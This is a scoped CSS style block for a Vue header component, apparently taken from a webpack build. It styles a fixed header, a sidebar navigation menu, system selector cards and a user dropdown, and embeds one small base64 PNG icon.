<!-- Add "scoped" attribute to limit CSS to this component only -->
<style scoped>
.header {
  position: fixed;
  height: 60px;
  z-index: 99;
  background: #000927;
  width: 100%;
}
.header .logo {
  float: left;
  height: 20px;
  margin: 20px;
}
.header .language {
  float: right;
  margin: 20px;
  /* height: 20px; */
  /* overflow: hidden; */
}

.header .user {
  float: right;
  margin: 18px 35px 0 0;
  height: 24px;
  width: 24px;
  cursor: pointer;
  display: flex;
  align-items: center;
}
.header .user img {
  height: 24px;
  width: 24px;
  margin-right: 5px;
}
.headerButton {
  min-width: 186px;
  max-width: 220px;
  height: 36px;
  margin: 12px 36px;
  float: right;
  line-height: 36px;
  font-size: 14px;
}
.lefter {
  /* position: fixed; */
  position: absolute;
  top: 60px;
  width: 260px;
  height: 100%;
  background: #fff;
  box-shadow: 4px 0 4px 0 rgba(122, 138, 153, 0.1);
  overflow: auto;
  z-index: 90;
}
.lefterButton {
  width: 228px;
  height: 40px;
  margin: 20px auto;
  line-height: 40px;
  font-size: 14px;
}
.left_ul {
  text-align: left;
  width: 100%;
  overflow: hidden;
  height: 44px;
  line-height: 44px;
  font-size: 14px;
  text-indent: 15px;
  font-weight: 700;
  color: #000927;
  cursor: pointer;
  font-family: Noto Sans !important;
}
.left_ul > div {
  width: 80%;
  line-height: 22px;
  text-indent: 0;
  display: inline-block;
}
.left_ul img {
  float: right;
  height: 16px;
  width: 16px;
  margin: 14px 15px 0 0;
}
.left_a {
  text-align: left;
  display: block;
  height: 44px;
  line-height: 44px;
  color: #45484d;
  font-size: 14px;
  white-space: nowrap;
  width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
}
.left_a img {
  float: left;
  height: 16px;
  width: 16px;
  margin: 14px 15px 0;
}
.left_a.mr {
  background: rgba(0, 238, 195, 0.1);
  background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAQCAYAAAArij59AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTQ1IDc5LjE2MzQ5OSwgMjAxOC8wOC8xMy0xNjo0MDoyMiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTkgKFdpbmRvd3MpIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjI0RDBERTAzRTZGOTExRUJBQTA1QTA1OUI2Qzg2QzlGIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjI0RDBERTA0RTZGOTExRUJBQTA1QTA1OUI2Qzg2QzlGIj4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6MjREMERFMDFFNkY5MTFFQkFBMDVBMDU5QjZDODZDOUYiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6MjREMERFMDJFNkY5MTFFQkFBMDVBMDU5QjZDODZDOUYiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz6eA/R4AAAARElEQVR42mL8//8/Awwwfj4EojyBeC5UKJkRi4JnQCwJFXrOxIAJJJHZ2BSggFEFtFTwHIn9ApuCFJAEED8FRTdAgAEAXGcRSfe21dsAAAAASUVORK5CYII=);
  background-repeat: no-repeat;
  background-position: 0;
  color: #000927;
}
.left_a img:first-child {
  display: block;
}
.left_a.mr img:first-child,
.left_a img:first-child + img {
  display: none;
}
.left_a.mr img:first-child + img {
  display: block;
}
.system {
  height: 48px;
  width: 228px;
  border: 1px solid #f6f8fa;
  border-radius: 10px;
  color: #45484d;
  text-align: left;
  font-size: 13px;
  line-height: 48px;
  margin: 0 auto 10px;
  background: #f6f8fa;
  cursor: pointer;
  display: flex;
}
.system .name {
  width: 211px;
  /*强制文字在一行文本框内*/
  white-space: nowrap;
  /*溢出部分文字隐藏*/
  overflow: hidden;
  /*溢出部分省略号处理*/
  text-overflow: ellipsis;
}
.system_logo {
  height: 16px;
  width: 16px;
  float: left;
  margin: 16px 7px 16px 15px;
  font-size: 20px;
}
.system_yes {
  float: right;
  height: 16px;
  width: 16px;
  margin: 16px 10px;
  display: none;
}
.system.ok .system_yes {
  display: block;
}
.system.ok {
  border: 1px solid #00eec3;
  justify-content: space-between;
}
.system.add {
  background: #fff;
  border: 1.5px dashed #c6c7c8;
}
.system.add:hover {
  border: 1.5px dashed #00eec3;
}
.contentShell {
  overflow: auto;
  margin-top: 60px;
  margin-left: 260px;
  position: relative;
}
.users {
  /* position: fixed;
  top: 56px;
  right: 22px; */
  width: 250px;
  border-radius: 12px;
  overflow: hidden;
  /* padding-bottom: 8px; */
  background: #fff;
  z-index: 999;
  font-size: 14px;
  -webkit-box-shadow: 0 4px 12px -4px rgba(122, 138, 153, 0.4);
  box-shadow: 0 4px 12px -4px rgba(122, 138, 153, 0.4);
}
.users .user_tit {
  height: 44px;
  line-height: 44px;
  padding-top: 8px;
  background: #f6f8fa;
  font-size: 13px;
  color: #45484d;
  overflow: hidden;
  font-family: Noto Sans;
  font-size: 13px;
  color: #45484d;
  font-weight: 400;
}
.users .user_tit img {
  width: 24px;
  height: 24px;
  float: left;
  margin: 10px 10px 20px;
}
.users .user_li {
  border-top: 1px solid #f0f2f3;
  line-height: 44px;
  height: 44px;
  text-indent: 20px;
  cursor: pointer;
  font-family: Noto Sans;
  font-size: 14px;
  color: #000927;
  font-weight: 400;
  opacity: 0.3;
  filter: alpha(opacity=60);
  background: #c3c3c3;
  /* border-bottom: 1px solid #f6f8fa; */
}
.users .user_li:last-child {
  border-bottom: none;
}
.el-dropdown {
  float: right;
}
.el-dropdown-menu {
  border: none;
  padding: 0 0;
  border-radius: 12px;
}
.el-dropdown-menu__item {
  padding: 0;
}
</style>



// WEBPACK FOOTER //
// src/components/header.vue